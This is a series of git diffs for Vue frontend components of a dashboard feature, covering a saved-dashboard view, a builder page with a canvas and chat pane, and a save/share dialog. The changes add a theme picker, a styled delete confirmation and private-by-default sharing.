+				<Badge v-else-if="detail.scope === 'Org'" variant="subtle" theme="blue" label="Everyone" />
+				<Badge v-else variant="subtle" theme="gray" label="Private" />
+			</div>
+			<p v-if="detail.description" class="px-5 pt-1 text-p-sm text-ink-gray-6">
+				{{ detail.description }}
+			</p>
+			<div class="px-5 py-4">
+				<DashboardCanvas
+					ref="canvas"
+					mode="view"
+					:html="detail.html"
+					:dashboard="{ name: detail.name }"
+					:caps="caps"
+				/>
+			</div>
+		</div>
+
+		<SaveDashboardDialog
+			v-model="shareOpen"
+			share-only
+			:caps="caps"
+			:html="detail ? detail.html : ''"
+			:sources="detail ? detail.sources || [] : []"
+			:editing="detail"
+			@saved="onShared"
+		/>
+	</div>
+</template>
+
+<script setup>
+// DashboardView - /dashboards/:id, the read-only render of a saved dashboard.
+// The canvas runs mode="view": data resolves by SOURCE NAME through
+// run_dashboard_source (the server-stored spec is authoritative; whatever spec
+// the html itself declares is ignored here), and the iframe grows to its
+// reported height while this page scrolls. Export captures inside the iframe
+// (html-to-image injected over postMessage - the CSP allows no external
+// fetches) and assembles PNG/PDF downloads out here.
+import { ref, computed, onMounted } from "vue"
+import { useRouter } from "vue-router"
+import {
+	Badge,
+	Breadcrumbs,
+	Button,
+	Dropdown,
+	ErrorMessage,
+	FeatherIcon,
+	LoadingIndicator,
+	confirmDialog,
+	toast,
+} from "frappe-ui"
+import LayoutHeader from "@/components/LayoutHeader.vue"
+import { setChatPrefill } from "@/composables/chatPrefill"
+import { getDashboard, getDashboardsCaps, deleteDashboard } from "@/api/dashboards"
+import DashboardCanvas from "./DashboardCanvas.vue"
+import SaveDashboardDialog from "./SaveDashboardDialog.vue"
+
+const props = defineProps({
+	id: { type: String, required: true },
+})
+
+const router = useRouter()
+
+function errMsg(e) {
+	return (e && ((e.messages && e.messages[0]) || e.message)) || "Something went wrong."
+}
+
+const detail = ref(null)
+const loading = ref(true)
+const blocked = ref(false)
+const notFound = ref(false)
+const error = ref("")
+const canvas = ref(null)
+const exporting = ref(false)
+const shareOpen = ref(false)
+
+// caps feed the share dialog's scope options; best-effort (share stays hidden
+// until they land - view/export need nothing from them).
+const caps = ref({ creatable_scopes: [], manageable_roles: [] })
+
+async function load() {
+	loading.value = true
+	blocked.value = false
+	notFound.value = false
+	error.value = ""
+	try {
+		detail.value = (await getDashboard(props.id)) || null
+		if (!detail.value) notFound.value = true
+	} catch (e) {
+		if (e && (e.status === 403 || e.exc_type === "PermissionError")) blocked.value = true
+		else if (e && (e.status === 404 || e.exc_type === "DoesNotExistError")) notFound.value = true
+		else error.value = errMsg(e)
+	} finally {
+		loading.value = false
+	}
+}
+
+function goBack() {
+	router.push({ name: "DashboardsPage", hash: "#saved" })
+}
+
+// ── header actions ───────────────────────────────────────────────────────────
+const canShare = computed(
+	() => !!(detail.value && detail.value.can_edit && (caps.value.creatable_scopes || []).length > 1)
+)
+
+const moreOptions = computed(() => {
+	const out = []
+	if (canShare.value) out.push({ label: "Share…", icon: "users", onClick: () => (shareOpen.value = true) })
+	if (detail.value && detail.value.can_edit) {
+		out.push({ label: "Delete", icon: "trash-2", theme: "red", onClick: confirmDelete })
+	}
+	return out
+})
+
+const exportOptions = [
+	{ label: "PNG image", onClick: () => doExport("png") },
+	{ label: "PDF slides", onClick: () => doExport("pdf") },
+]
+
+async function doExport(format) {
+	if (exporting.value || !canvas.value) return
+	exporting.value = true
+	try {
+		await canvas.value.exportAs(format, detail.value && detail.value.dashboard_title)
+	} catch (e) {
+		toast.error(errMsg(e))
+	} finally {
+		exporting.value = false
+	}
+}
+
+function confirmDelete() {
+	const title = (detail.value && detail.value.dashboard_title) || props.id
+	confirmDialog({
+		title: "Delete dashboard?",
+		message: `Delete “${title}”? This can't be undone.`,
+		onConfirm: async ({ hideDialog }) => {
+			try {
+				await deleteDashboard(props.id)
+				hideDialog()
+				toast.success("Dashboard deleted")
+				goBack()
+			} catch (e) {
+				toast.error(errMsg(e))
+			}
+		},
+	})
+}
+
+function onShared(fresh) {
+	if (fresh && fresh.name) detail.value = fresh
+	toast.success("Sharing updated")
+}
+
+// Hand the dashboard to the main chat as viewing context (api.js#sendMessage
+// forwards `context` because it carries a doctype) and let ChatView's prefill
+// consumption start a fresh conversation + auto-send.
+function discussInChat() {
+	const title = (detail.value && detail.value.dashboard_title) || props.id
+	setChatPrefill({
+		text: `Let's discuss the dashboard "${title}" — what does it show and what stands out?`,
+		autoSend: true,
+		context: { doctype: "Jarvis Dashboard", name: props.id },
+	})
+	router.push("/")
+}
+
+onMounted(() => {
+	load()
+	getDashboardsCaps()
+		.then((c) => {
+			if (c) caps.value = { ...caps.value, ...c }
+		})
+		.catch(() => {})
+})
+</script>

--- a/frontend/src/pages/dashboards/DashboardView.vue
+++ b/frontend/src/pages/dashboards/DashboardView.vue
@@ -15,6 +15,10 @@
 						<!-- label → aria-label on icon-only buttons (frappe-ui) -->
 						<Button icon="more-horizontal" variant="ghost" label="Dashboard actions" />
 					</Dropdown>
+					<!-- render theme: editors persist the pick, viewers restyle locally -->
+					<Dropdown :options="themeOptions">
+						<Button variant="ghost" :label="themeLabel(viewTheme)" iconLeft="droplet" />
+					</Dropdown>
 					<Button label="Discuss in chat" iconLeft="message-circle" @click="discussInChat" />
 					<Button
 						v-if="detail.can_edit"
@@ -100,6 +104,7 @@
 					:html="detail.html"
 					:dashboard="{ name: detail.name }"
 					:caps="caps"
+					:theme="viewTheme"
 				/>
 			</div>
 		</div>
@@ -139,7 +144,8 @@ import {
 } from "frappe-ui"
 import LayoutHeader from "@/components/LayoutHeader.vue"
 import { setChatPrefill } from "@/composables/chatPrefill"
-import { getDashboard, getDashboardsCaps, deleteDashboard } from "@/api/dashboards"
+import { getDashboard, getDashboardsCaps, deleteDashboard, saveDashboard } from "@/api/dashboards"
+import { DEFAULT_THEME, THEME_OPTIONS, themeKey, themeLabel } from "@/lib/dashboardThemes"
 import DashboardCanvas from "./DashboardCanvas.vue"
 import SaveDashboardDialog from "./SaveDashboardDialog.vue"
 
@@ -162,6 +168,24 @@ const canvas = ref(null)
 const exporting = ref(false)
 const shareOpen = ref(false)
 
+// Render theme: seeded from the saved dashboard; picking restyles immediately
+// and (for editors) persists quietly — viewers just restyle their own view.
+const viewTheme = ref(DEFAULT_THEME)
+const themeOptions = THEME_OPTIONS.map((t) => ({
+	label: t.label,
+	onClick: () => pickTheme(t.key),
+}))
+async function pickTheme(key) {
+	viewTheme.value = key
+	if (!(detail.value && detail.value.can_edit)) return
+	try {
+		await saveDashboard({ name: detail.value.name, theme: themeLabel(key) })
+		detail.value.theme = themeLabel(key)
+	} catch (e) {
+		toast.error(errMsg(e))
+	}
+}
+
 // caps feed the share dialog's scope options; best-effort (share stays hidden
 // until they land - view/export need nothing from them).
 const caps = ref({ creatable_scopes: [], manageable_roles: [] })
@@ -174,6 +198,7 @@ async function load() {
 	try {
 		detail.value = (await getDashboard(props.id)) || null
 		if (!detail.value) notFound.value = true
+		else viewTheme.value = themeKey(detail.value.theme)
 	} catch (e) {
 		if (e && (e.status === 403 || e.exc_type === "PermissionError")) blocked.value = true
 		else if (e && (e.status === 404 || e.exc_type === "DoesNotExistError")) notFound.value = true

--- a/frontend/src/pages/dashboards/DashboardView.vue
+++ b/frontend/src/pages/dashboards/DashboardView.vue
@@ -17,7 +17,12 @@
 					</Dropdown>
 					<!-- render theme: editors persist the pick, viewers restyle locally -->
 					<Dropdown :options="themeOptions">
-						<Button variant="ghost" :label="themeLabel(viewTheme)" iconLeft="droplet" />
+						<Button
+							variant="ghost"
+							:label="themeLabel(viewTheme)"
+							iconLeft="droplet"
+							iconRight="chevron-down"
+						/>
 					</Dropdown>
 					<Button label="Discuss in chat" iconLeft="message-circle" @click="discussInChat" />
 					<Button
@@ -118,6 +123,10 @@
 			:editing="detail"
 			@saved="onShared"
 		/>
+
+		<!-- Hand-rolled so the destructive action is a RED solid button (§3.2);
+		     frappe-ui's confirmDialog helper hardcodes a gray "Confirm". -->
+		<Dialog v-model="deleteOpen" :options="deleteDialogOptions" />
 	</div>
 </template>
 
@@ -135,11 +144,11 @@ import {
 	Badge,
 	Breadcrumbs,
 	Button,
+	Dialog,
 	Dropdown,
 	ErrorMessage,
 	FeatherIcon,
 	LoadingIndicator,
-	confirmDialog,
 	toast,
 } from "frappe-ui"
 import LayoutHeader from "@/components/LayoutHeader.vue"
@@ -243,23 +252,34 @@ async function doExport(format) {
 	}
 }
 
+const deleteOpen = ref(false)
 function confirmDelete() {
+	deleteOpen.value = true
+}
+const deleteDialogOptions = computed(() => {
 	const title = (detail.value && detail.value.dashboard_title) || props.id
-	confirmDialog({
+	return {
 		title: "Delete dashboard?",
 		message: `Delete “${title}”? This can't be undone.`,
-		onConfirm: async ({ hideDialog }) => {
-			try {
-				await deleteDashboard(props.id)
-				hideDialog()
-				toast.success("Dashboard deleted")
-				goBack()
-			} catch (e) {
-				toast.error(errMsg(e))
-			}
-		},
-	})
-}
+		actions: [
+			{
+				label: "Delete dashboard",
+				variant: "solid",
+				theme: "red",
+				onClick: async ({ close }) => {
+					try {
+						await deleteDashboard(props.id)
+						close()
+						toast.success("Dashboard deleted")
+						goBack()
+					} catch (e) {
+						toast.error(errMsg(e))
+					}
+				},
+			},
+		],
+	}
+})
 
 function onShared(fresh) {
 	if (fresh && fresh.name) detail.value = fresh

--- a/frontend/src/pages/dashboards/DashboardsPage.vue
+++ b/frontend/src/pages/dashboards/DashboardsPage.vue
@@ -35,6 +35,19 @@
 			<TabBar class="shrink-0" :tabs="TABS" :model-value="activeTab" @update:model-value="setTab" />
 
 			<!-- ============ Builder tab: canvas over chat, drag-split ============ -->
+			<!-- self-hosted benches have no gateway canvas route, so chat can't
+			     produce a rendered dashboard - say so instead of an eternal empty
+			     canvas (caps.canvas_available from get_dashboards_caps). -->
+			<div
+				v-if="activeTab === 'builder' && caps.canvas_available === false"
+				class="flex items-start gap-2 border-b bg-surface-amber-1 px-4 py-2"
+			>
+				<FeatherIcon name="alert-triangle" class="mt-0.5 size-4 shrink-0 text-ink-amber-3" />
+				<span class="text-sm text-ink-gray-7">
+					Live canvas rendering isn't available on this deployment, so chat can't draw a
+					dashboard here. You can still open and view saved dashboards.
+				</span>
+			</div>
 			<div v-if="activeTab === 'builder'" ref="builderEl" class="flex min-h-0 flex-1 flex-col">
 				<!-- canvas pane (the surface's one solid action lives here) -->
 				<div
@@ -44,9 +57,11 @@
 					<div class="flex shrink-0 items-center justify-between gap-2 border-b px-4 py-2">
 						<div class="flex min-w-0 items-center gap-2">
 							<span class="text-base font-semibold text-ink-gray-9">Canvas</span>
+							<!-- informational (which dashboard is loaded), not a dirty
+							     warning - so gray, not orange (§1.2 hue = meaning) -->
 							<Badge
 								v-if="editingDetail"
-								theme="orange"
+								theme="gray"
 								variant="subtle"
 								:label="`Editing ${editingDetail.dashboard_title || editingDetail.name}`"
 							/>
@@ -61,7 +76,12 @@
 							</router-link>
 							<!-- named render theme - the dashboard's look, not the app's -->
 							<Dropdown :options="themeOptions">
-								<Button variant="ghost" :label="themeLabel(builderTheme)" iconLeft="droplet" />
+								<Button
+								variant="ghost"
+								:label="themeLabel(builderTheme)"
+								iconLeft="droplet"
+								iconRight="chevron-down"
+							/>
 							</Dropdown>
 							<Button
 								variant="solid"
@@ -107,6 +127,7 @@
 					class="shrink-0 border-t"
 					:style="{ height: chatPct + '%' }"
 					:caps="caps"
+					:editing-name="editingDetail ? editingDetail.name : ''"
 					@canvas="onCanvas"
 					@reset="resetBuilder"
 				/>
@@ -216,10 +237,11 @@ const themeOptions = THEME_OPTIONS.map((t) => ({
 	onClick: () => (builderTheme.value = t.key),
 }))
 
-// Same per-user key DashboardChatPane persists its conversation under (vueuse
-// syncs same-document instances) - read for the save payload's
-// source_conversation and cleared by "New dashboard" before the pane mounts.
+// Same per-user keys DashboardChatPane persists under (vueuse syncs same-
+// document instances) — the page seeds/clears them around edit/new so the chat
+// pane resumes the right thread and data mode instead of a stale sticky one.
 const chatConv = useStorage(`jarvis-dash-conv-${session.user || "anon"}`, "")
+const dashDataMode = useStorage(`jarvis-dash-datamode-${session.user || "anon"}`, "auto")
 
 // Chat drew/updated an artifact: pick the LAST html item and pull its
 // render-ready content onto the canvas.
@@ -252,6 +274,7 @@ function onSaved(detail) {
 // + setTab separately would race on route.query).
 function newDashboard() {
 	chatConv.value = "" // pane isn't mounted on the Saved tab; clear before it is
+	dashDataMode.value = "auto"
 	builderHtml.value = ""
 	editingDetail.value = null
 	savedName.value = ""
@@ -263,6 +286,8 @@ function newDashboard() {
 
 // Also fired by the chat pane's own "New chat" (emit("reset")).
 function resetBuilder() {
+	chatConv.value = ""
+	dashDataMode.value = "auto"
 	builderHtml.value = ""
 	editingDetail.value = null
 	savedName.value = ""
@@ -272,6 +297,9 @@ function resetBuilder() {
 }
 
 // ?edit=<name> deep-link: seed the canvas + save dialog from a saved dashboard.
+// Also resume the conversation that built it (so the agent has memory of the
+// document) and seed the data-mode from its derived type, so an edit session
+// never silently drifts onto/converts the wrong dashboard.
 async function loadEdit(name) {
 	try {
 		const d = await getDashboard(name)
@@ -280,6 +308,10 @@ async function loadEdit(name) {
 			editingDetail.value = d
 			savedName.value = d.name
 			builderTheme.value = themeKey(d.theme)
+			// resume the build thread, or a fresh one — never the stale sticky
+			// conversation left over from editing a different dashboard.
+			chatConv.value = d.source_conversation || ""
+			dashDataMode.value = d.dashboard_type === "Connected" ? "live" : "static"
 		}
 	} catch (e) {
 		toast.error(errMsg(e))

--- a/frontend/src/pages/dashboards/DashboardsPage.vue
+++ b/frontend/src/pages/dashboards/DashboardsPage.vue
@@ -59,6 +59,10 @@
 							>
 								View dashboard
 							</router-link>
+							<!-- named render theme - the dashboard's look, not the app's -->
+							<Dropdown :options="themeOptions">
+								<Button variant="ghost" :label="themeLabel(builderTheme)" iconLeft="droplet" />
+							</Dropdown>
 							<Button
 								variant="solid"
 								label="Save dashboard"
@@ -72,6 +76,7 @@
 						mode="builder"
 						:html="builderHtml"
 						:caps="caps"
+						:theme="builderTheme"
 						@sources="(s) => (detectedSources = s)"
 					/>
 				</div>
@@ -117,6 +122,7 @@
 				:sources="detectedSources"
 				:editing="editingDetail"
 				:conversation="chatConv"
+				:theme="builderTheme"
 				@saved="onSaved"
 			/>
 		</template>
@@ -137,12 +143,13 @@
 import { ref, computed, watch, onMounted, onBeforeUnmount } from "vue"
 import { useRoute, useRouter } from "vue-router"
 import { useStorage } from "@vueuse/core"
-import { Badge, Breadcrumbs, Button, FeatherIcon, toast } from "frappe-ui"
+import { Badge, Breadcrumbs, Button, Dropdown, FeatherIcon, toast } from "frappe-ui"
 import LayoutHeader from "@/components/LayoutHeader.vue"
 import TabBar from "@/components/list/TabBar.vue"
 import { session } from "@/data/session"
 import { getCanvas } from "@/api"
 import { getDashboardsCaps, getDashboard } from "@/api/dashboards"
+import { DEFAULT_THEME, THEME_OPTIONS, themeKey, themeLabel } from "@/lib/dashboardThemes"
 import DashboardCanvas from "./DashboardCanvas.vue"
 import DashboardChatPane from "./DashboardChatPane.vue"
 import SavedDashboardsTab from "./SavedDashboardsTab.vue"
@@ -201,6 +208,13 @@ const savedName = ref("") // last save's name → the "View dashboard" link
 const detectedSources = ref([]) // parsed #jarvis-sources (DashboardCanvas emit)
 const saveOpen = ref(false)
 const chatPane = ref(null)
+// Named render theme; "Jarvis" (the app's design language) unless picked or
+// seeded from the edited dashboard.
+const builderTheme = ref(DEFAULT_THEME)
+const themeOptions = THEME_OPTIONS.map((t) => ({
+	label: t.label,
+	onClick: () => (builderTheme.value = t.key),
+}))
 
 // Same per-user key DashboardChatPane persists its conversation under (vueuse
 // syncs same-document instances) - read for the save payload's
@@ -242,6 +256,7 @@ function newDashboard() {
 	editingDetail.value = null
 	savedName.value = ""
 	detectedSources.value = []
+	builderTheme.value = DEFAULT_THEME
 	activeTab.value = "builder"
 	router.push({ hash: "", query: {} })
 }
@@ -252,6 +267,7 @@ function resetBuilder() {
 	editingDetail.value = null
 	savedName.value = ""
 	detectedSources.value = []
+	builderTheme.value = DEFAULT_THEME
 	if (route.query.edit) router.replace({ query: {}, hash: route.hash })
 }
 
@@ -263,6 +279,7 @@ async function loadEdit(name) {
 			builderHtml.value = d.html || ""
 			editingDetail.value = d
 			savedName.value = d.name
+			builderTheme.value = themeKey(d.theme)
 		}
 	} catch (e) {
 		toast.error(errMsg(e))

--- a/frontend/src/pages/dashboards/DashboardsPage.vue
+++ b/frontend/src/pages/dashboards/DashboardsPage.vue
@@ -1,0 +1,344 @@
+<template>
+	<div class="flex h-full flex-col overflow-hidden">
+		<!-- friendly no-access state: get_dashboards_caps rejected with a real 403
+		     (TriggersPage probe precedent - transient failures retry, never block) -->
+		<template v-if="accessDenied">
+			<div class="flex flex-1 flex-col items-center justify-center gap-3 px-8 text-center">
+				<FeatherIcon name="bar-chart-2" class="size-7.5 text-ink-gray-5" />
+				<div class="flex flex-col items-center gap-1">
+					<span class="text-lg font-medium text-ink-gray-8">No access to Dashboards</span>
+					<span class="text-p-base text-ink-gray-6">
+						Ask your Jarvis admin for access to dashboards.
+					</span>
+				</div>
+			</div>
+		</template>
+
+		<template v-else>
+			<!-- THE LayoutHeader for /dashboards (both tabs; SavedDashboardsTab's
+			     ListPage runs show-header=false) -->
+			<LayoutHeader>
+				<template #left-header>
+					<Breadcrumbs :items="[{ label: 'Dashboards', route: { name: 'DashboardsPage' } }]" />
+				</template>
+				<template #right-header>
+					<Button
+						v-if="activeTab === 'saved'"
+						variant="solid"
+						label="New dashboard"
+						iconLeft="plus"
+						@click="newDashboard"
+					/>
+				</template>
+			</LayoutHeader>
+
+			<TabBar class="shrink-0" :tabs="TABS" :model-value="activeTab" @update:model-value="setTab" />
+
+			<!-- ============ Builder tab: canvas over chat, drag-split ============ -->
+			<div v-if="activeTab === 'builder'" ref="builderEl" class="flex min-h-0 flex-1 flex-col">
+				<!-- canvas pane (the surface's one solid action lives here) -->
+				<div
+					class="flex min-h-0 flex-1 flex-col"
+					:class="resizing ? 'pointer-events-none select-none' : ''"
+				>
+					<div class="flex shrink-0 items-center justify-between gap-2 border-b px-4 py-2">
+						<div class="flex min-w-0 items-center gap-2">
+							<span class="text-base font-semibold text-ink-gray-9">Canvas</span>
+							<Badge
+								v-if="editingDetail"
+								theme="orange"
+								variant="subtle"
+								:label="`Editing ${editingDetail.dashboard_title || editingDetail.name}`"
+							/>
+						</div>
+						<div class="flex shrink-0 items-center gap-3">
+							<router-link
+								v-if="savedName"
+								:to="{ name: 'DashboardView', params: { id: savedName } }"
+								class="text-sm text-ink-blue-link"
+							>
+								View dashboard
+							</router-link>
+							<Button
+								variant="solid"
+								label="Save dashboard"
+								:disabled="!builderHtml"
+								@click="openSave"
+							/>
+						</div>
+					</div>
+					<DashboardCanvas
+						class="min-h-0 flex-1"
+						mode="builder"
+						:html="builderHtml"
+						:caps="caps"
+						@sources="(s) => (detectedSources = s)"
+					/>
+				</div>
+
+				<!-- drag divider (Sidebar's resize pattern, rotated). While dragging,
+				     the canvas wrapper above goes pointer-events-none so the iframe
+				     can't swallow the mousemoves. -->
+				<div
+					class="group relative z-10 flex h-2.5 shrink-0 cursor-row-resize items-center justify-center"
+					role="separator"
+					aria-orientation="horizontal"
+					title="Drag to resize · double-click to reset"
+					@mousedown.prevent="startResize"
+					@dblclick="resetSplit"
+				>
+					<span
+						class="absolute inset-x-0 top-1/2 h-px -translate-y-1/2 transition-colors"
+						:class="resizing ? 'bg-surface-gray-4' : 'bg-transparent group-hover:bg-surface-gray-4'"
+					/>
+					<span
+						class="relative h-1 w-7 rounded-full bg-surface-gray-4 transition-opacity"
+						:class="resizing ? 'opacity-100' : 'opacity-30 group-hover:opacity-100'"
+					/>
+				</div>
+
+				<DashboardChatPane
+					ref="chatPane"
+					class="shrink-0 border-t"
+					:style="{ height: chatPct + '%' }"
+					:caps="caps"
+					@canvas="onCanvas"
+					@reset="resetBuilder"
+				/>
+			</div>
+
+			<!-- ============ Saved tab ============ -->
+			<SavedDashboardsTab v-else class="min-h-0 flex-1" />
+
+			<SaveDashboardDialog
+				v-model="saveOpen"
+				:caps="caps"
+				:html="builderHtml"
+				:sources="detectedSources"
+				:editing="editingDetail"
+				:conversation="chatConv"
+				@saved="onSaved"
+			/>
+		</template>
+	</div>
+</template>
+
+<script setup>
+// DashboardsPage - the routed component for /dashboards: hash-synced tab shell
+// (TriggersPage precedent; no hash or "#builder" = Builder, "#saved" = Saved)
+// plus the single get_dashboards_caps probe that feeds both tabs. The Builder
+// tab is the core UX: the sandboxed canvas on top, the assistant chat below,
+// split by a draggable divider (persisted %). The chat's canvas frames pull
+// the agent's html artifact onto the canvas; Save opens the scope/title
+// dialog; ?edit=<name> seeds the canvas from a saved dashboard for editing.
+// Probe failures follow the TriggersPage rule: a genuine 403 shows the
+// no-access state; a transient 500/network blip retries once and otherwise
+// proceeds with default caps rather than blocking an authorized user.
+import { ref, computed, watch, onMounted, onBeforeUnmount } from "vue"
+import { useRoute, useRouter } from "vue-router"
+import { useStorage } from "@vueuse/core"
+import { Badge, Breadcrumbs, Button, FeatherIcon, toast } from "frappe-ui"
+import LayoutHeader from "@/components/LayoutHeader.vue"
+import TabBar from "@/components/list/TabBar.vue"
+import { session } from "@/data/session"
+import { getCanvas } from "@/api"
+import { getDashboardsCaps, getDashboard } from "@/api/dashboards"
+import DashboardCanvas from "./DashboardCanvas.vue"
+import DashboardChatPane from "./DashboardChatPane.vue"
+import SavedDashboardsTab from "./SavedDashboardsTab.vue"
+import SaveDashboardDialog from "./SaveDashboardDialog.vue"
+
+const route = useRoute()
+const router = useRouter()
+
+function errMsg(e) {
+	return (e && ((e.messages && e.messages[0]) || e.message)) || "Something went wrong."
+}
+
+const TABS = [
+	{ label: "Builder", value: "builder" },
+	{ label: "Saved", value: "saved" },
+]
+
+// caps flow down reactively - the save dialog's scope options appear once the
+// probe lands; the default keeps a plain User-scoped save path.
+const caps = ref({
+	creatable_scopes: ["User"],
+	manageable_roles: [],
+	max_sources: 0,
+	max_html_chars: 0,
+	max_rows: 0,
+	canvas_available: false,
+})
+const accessDenied = ref(false)
+
+// ── hash-synced tabs (TriggersPage precedent) ────────────────────────────────
+const activeTab = ref("builder")
+function applyHash() {
+	// tolerate suffixed forms like "#saved?x=1"
+	const h = (route.hash || "").replace(/^#/, "").split("?")[0]
+	activeTab.value = h === "saved" ? "saved" : "builder"
+}
+function setTab(v) {
+	if (v === activeTab.value) return
+	activeTab.value = v
+	router.push({ hash: v === "builder" ? "" : `#${v}`, query: route.query })
+}
+applyHash()
+// back/forward restores the tab (guard to this route so other pages' hashes
+// are ignored - the SkillsPage rule)
+watch(
+	() => route.hash,
+	() => {
+		if (route.name === "DashboardsPage") applyHash()
+	}
+)
+
+// ── builder state ────────────────────────────────────────────────────────────
+const builderHtml = ref("")
+const editingDetail = ref(null) // full get_dashboard detail while editing
+const savedName = ref("") // last save's name → the "View dashboard" link
+const detectedSources = ref([]) // parsed #jarvis-sources (DashboardCanvas emit)
+const saveOpen = ref(false)
+const chatPane = ref(null)
+
+// Same per-user key DashboardChatPane persists its conversation under (vueuse
+// syncs same-document instances) - read for the save payload's
+// source_conversation and cleared by "New dashboard" before the pane mounts.
+const chatConv = useStorage(`jarvis-dash-conv-${session.user || "anon"}`, "")
+
+// Chat drew/updated an artifact: pick the LAST html item and pull its
+// render-ready content onto the canvas.
+async function onCanvas({ message_id, items }) {
+	const htmlItem = [...(items || [])].reverse().find((it) => it && it.type === "html")
+	if (!htmlItem || !message_id) return
+	try {
+		const r = await getCanvas(message_id, htmlItem.name, 0)
+		const content = r && (r.content || r.data_url)
+		if (content) builderHtml.value = content
+	} catch (e) {
+		toast.error(errMsg(e))
+	}
+}
+
+function openSave() {
+	if (!builderHtml.value) return
+	saveOpen.value = true
+}
+
+function onSaved(detail) {
+	savedName.value = (detail && detail.name) || ""
+	// keep editing the row we just saved - the next Save is "Save changes"
+	if (detail && detail.name) editingDetail.value = detail
+	toast.success("Dashboard saved")
+}
+
+// "New dashboard" (Saved tab header) - fresh chat + empty canvas on Builder.
+// One navigation clears the tab hash AND any ?edit seed together (resetBuilder
+// + setTab separately would race on route.query).
+function newDashboard() {
+	chatConv.value = "" // pane isn't mounted on the Saved tab; clear before it is
+	builderHtml.value = ""
+	editingDetail.value = null
+	savedName.value = ""
+	detectedSources.value = []
+	activeTab.value = "builder"
+	router.push({ hash: "", query: {} })
+}
+
+// Also fired by the chat pane's own "New chat" (emit("reset")).
+function resetBuilder() {
+	builderHtml.value = ""
+	editingDetail.value = null
+	savedName.value = ""
+	detectedSources.value = []
+	if (route.query.edit) router.replace({ query: {}, hash: route.hash })
+}
+
+// ?edit=<name> deep-link: seed the canvas + save dialog from a saved dashboard.
+async function loadEdit(name) {
+	try {
+		const d = await getDashboard(name)
+		if (d && d.name) {
+			builderHtml.value = d.html || ""
+			editingDetail.value = d
+			savedName.value = d.name
+		}
+	} catch (e) {
+		toast.error(errMsg(e))
+	}
+}
+
+// ── the drag-split (Sidebar's resize machinery, vertical) ────────────────────
+const builderEl = ref(null)
+const _split = useStorage("jarvis-dash-split", 40)
+const clampPct = (n) => Math.min(70, Math.max(20, Math.round(Number(n) || 40)))
+const chatPct = computed({
+	get: () => clampPct(_split.value),
+	set: (v) => (_split.value = clampPct(v)),
+})
+const resizing = ref(false)
+let startY = 0
+let startPct = 40
+let containerH = 1
+
+function startResize(e) {
+	if (e.button !== 0) return
+	resizing.value = true
+	startY = e.clientY
+	startPct = chatPct.value
+	containerH = (builderEl.value && builderEl.value.getBoundingClientRect().height) || 1
+	window.addEventListener("mousemove", onResize)
+	window.addEventListener("mouseup", stopResize)
+	document.body.style.userSelect = "none"
+	document.body.style.cursor = "row-resize"
+}
+function onResize(e) {
+	chatPct.value = startPct + ((startY - e.clientY) / containerH) * 100
+}
+function stopResize() {
+	if (!resizing.value) return
+	resizing.value = false
+	window.removeEventListener("mousemove", onResize)
+	window.removeEventListener("mouseup", stopResize)
+	document.body.style.userSelect = ""
+	document.body.style.cursor = ""
+}
+function resetSplit() {
+	chatPct.value = 40
+}
+onBeforeUnmount(stopResize)
+
+// ── caps probe (403 vs transient, TriggersPage pattern) ──────────────────────
+function isPermissionError(e) {
+	return !!(e && (e.status === 403 || e.exc_type === "PermissionError"))
+}
+
+onMounted(async () => {
+	let fresh = null
+	try {
+		fresh = await getDashboardsCaps()
+	} catch (e) {
+		if (isPermissionError(e)) {
+			accessDenied.value = true
+			return
+		}
+		// transient (500/network) - retry once before giving up
+		await new Promise((r) => setTimeout(r, 1000))
+		try {
+			fresh = await getDashboardsCaps()
+		} catch (e2) {
+			if (isPermissionError(e2)) {
+				accessDenied.value = true
+				return
+			}
+			// still transient - keep the defaults instead of blocking
+			console.warn("get_dashboards_caps failed twice; keeping default caps", e2)
+		}
+	}
+	if (fresh) caps.value = { ...caps.value, ...fresh }
+
+	const edit = typeof route.query.edit === "string" ? route.query.edit : ""
+	if (edit) loadEdit(edit)
+})
+</script>

--- a/frontend/src/pages/dashboards/SaveDashboardDialog.vue
+++ b/frontend/src/pages/dashboards/SaveDashboardDialog.vue
@@ -82,6 +82,7 @@
 import { reactive, ref, computed, watch } from "vue"
 import { Badge, Button, Dialog, ErrorMessage, FormControl } from "frappe-ui"
 import { saveDashboard } from "@/api/dashboards"
+import { themeLabel } from "@/lib/dashboardThemes"
 
 const props = defineProps({
 	modelValue: { type: Boolean, default: false },
@@ -93,6 +94,8 @@ const props = defineProps({
 	editing: { type: Object, default: null },
 	conversation: { type: String, default: "" }, // source_conversation for new saves
 	shareOnly: { type: Boolean, default: false },
+	// active render theme key (lib/dashboardThemes); persisted with the save
+	theme: { type: String, default: "" },
 })
 
 const emit = defineEmits(["update:modelValue", "saved"])
@@ -166,6 +169,8 @@ async function save() {
 		scope: form.scope,
 		sources: props.sources,
 		source_conversation: (e && e.source_conversation) || props.conversation || "",
+		// share-only re-sends the stored theme; the builder persists the picker's
+		theme: props.shareOnly ? (e && e.theme) || "Jarvis" : themeLabel(props.theme),
 	}
 	if (e && e.name) payload.name = e.name
 	if (form.scope === "Role") payload.target_role = form.target_role

--- a/frontend/src/pages/dashboards/SaveDashboardDialog.vue
+++ b/frontend/src/pages/dashboards/SaveDashboardDialog.vue
@@ -141,7 +141,14 @@ watch(
 		form.dashboard_title = (e && e.dashboard_title) || ""
 		form.description = (e && e.description) || ""
 		const scopes = props.caps.creatable_scopes || ["User"]
-		form.scope = e && e.scope && scopes.includes(e.scope) ? e.scope : scopes[0] || "User"
+		// private-first: even an admin (whose creatable_scopes lead with Org)
+		// must opt INTO sharing, never share by default
+		form.scope =
+			e && e.scope && scopes.includes(e.scope)
+				? e.scope
+				: scopes.includes("User")
+					? "User"
+					: scopes[0] || "User"
 		form.target_role = (e && e.target_role) || ""
 	}
 )

--- a/frontend/src/pages/dashboards/SaveDashboardDialog.vue
+++ b/frontend/src/pages/dashboards/SaveDashboardDialog.vue
@@ -1,0 +1,183 @@
+<template>
+	<Dialog
+		:modelValue="modelValue"
+		:options="{ title: dialogTitle, size: 'md' }"
+		@update:modelValue="(v) => emit('update:modelValue', v)"
+	>
+		<template #body-content>
+			<div class="flex flex-col gap-4">
+				<template v-if="!shareOnly">
+					<div>
+						<FormControl
+							type="text"
+							label="Title"
+							required
+							placeholder="e.g. Monthly sales overview"
+							:modelValue="form.dashboard_title"
+							@update:modelValue="(v) => (form.dashboard_title = v)"
+						/>
+						<ErrorMessage :message="fieldErrors.title" class="mt-1" />
+					</div>
+					<FormControl
+						type="textarea"
+						label="Description"
+						:rows="2"
+						placeholder="What this dashboard shows (optional)"
+						:modelValue="form.description"
+						@update:modelValue="(v) => (form.description = v)"
+					/>
+				</template>
